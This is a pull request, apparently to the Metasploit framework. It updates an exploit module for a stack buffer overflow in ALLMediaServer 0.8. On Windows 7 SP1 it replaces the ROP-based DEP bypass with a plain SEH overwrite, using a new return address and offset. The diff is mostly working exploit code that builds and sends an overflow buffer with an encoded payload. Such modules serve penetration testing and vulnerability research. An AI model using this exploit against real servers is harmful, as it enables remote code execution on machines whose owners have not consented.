### PR TITLE
Target W7 updated according to #607

### DIFF
--- a/modules/exploits/windows/misc/allmediaserver_bof.rb
+++ b/modules/exploits/windows/misc/allmediaserver_bof.rb
@@ -17,9 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'ALLMediaServer 0.8 Buffer Overflow',
 			'Description'    => %q{
-				This module exploits a stack buffer overflow in ALLMediaServer 0.8.
-				The vulnerability is caused due to a boundary error within the
-				handling of HTTP request.
+				This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability
+				is caused due to a boundary error within the handling of HTTP request.
+
+				While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't
+				reliable across virtual (VMWare, VirtualBox) and physical  environments. Because of
+				this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default
+				DEP is OptIn and AllMediaServer won't run with DEP.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -56,9 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					],
 					[ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',
 						{
-							'Ret'       =>	0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll
-							'OffsetRop' =>	332,
-							'jmp'       =>	628,
+							'Ret'       =>	0x6ac5cc92, # ppr from avformat-53.dll
 							'Offset'    =>	1072
 						}
 					],
@@ -109,12 +111,18 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		connect
 
-		buffer = rand_text(target['OffsetRop'])	#junk
-		buffer << rop
-		buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload
-		buffer << rand_text(target['Offset'] - buffer.length)
-		buffer << generate_seh_record(target.ret)
-		buffer << payload.encoded
+		if target.name =~ /Windows 7/
+			buffer = rand_text(target['Offset'])
+			buffer << generate_seh_record(target.ret)
+			buffer << payload.encoded
+		else
+			buffer = rand_text(target['OffsetRop'])	#junk
+			buffer << rop
+			buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload
+			buffer << rand_text(target['Offset'] - buffer.length)
+			buffer << generate_seh_record(target.ret)
+			buffer << payload.encoded
+		end
 
 		print_status("Sending payload to ALLMediaServer on #{target.name}...")
 		sock.put(buffer)


### PR DESCRIPTION
According to testing reflected on #607 the stack pivoting isn't stable on W7 between virtual and physical environments. So avoiding ROP exploit on W7 at the moment because W7 is OptIn and AllMediaServer runs without DEP by default.
